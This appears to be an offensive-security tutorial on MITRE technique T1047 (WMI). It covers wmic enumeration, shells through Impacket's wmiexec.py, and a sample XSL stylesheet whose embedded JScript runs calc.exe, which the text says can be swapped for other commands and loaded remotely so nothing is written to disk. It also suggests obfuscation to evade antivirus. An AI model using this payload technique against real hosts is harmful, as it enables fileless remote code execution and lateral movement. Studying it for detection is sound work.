Windows Management Instrumentation (WMI)

ID: T1047 Tactic: Execution
Windows Management Instrumentation(WMI) is a Windows Administration feature that provides a uniform environment for local and remote access to Windows System components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operate over port 135.
An adversary can use WMI to interact with local and remote systems and use it as a means to perform many tactic functions, such as gathering information for Discovery and Remote Execution of files as part of Lateral Movement.
Very awesome things we can do with wmic(Command-Line), in a local and/or remote way.
Let's enumerate locally we can grab valuable info such as Name,Manufacturer,Model,Domain and a Description.
Let's get more in detailed and grab more information.
wmic environment list
Great, what about users?,Groups?
Any missing Patches?
Let's grab a shell with Linux, we can use wmiexec.py from the tool packages from Impacket
Let's see how it looks grabbing the same info we can still enumerate with wmic using wmicexec this is just a shell on cmd and it should still be the same when grabbing info.
Let's try and execute code, here wmic executes XSL files the great thing about this is that with wmic, not like other's we don't need to add the extension into our file's when calling it. With this example file we can tell that it is using the JScript language to call "calc.exe" we can change this to our liking to execute other commands.
Example file:
<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]> </ms:script>
</stylesheet>
Let's try executing locally first it should be a simple command such as calc.exe
What about calling it remotely?, Yeah the syntax would be closely the same we just need to add our URL with the xsl payload
We can see here that our payload is being called and executed from our Remote Host, this is a great way to execute file's without having them saved to Disk. These examples are very basic and be aware that they will get caught by AV's some great way to avoid this is adding some obfuscation to these files.
​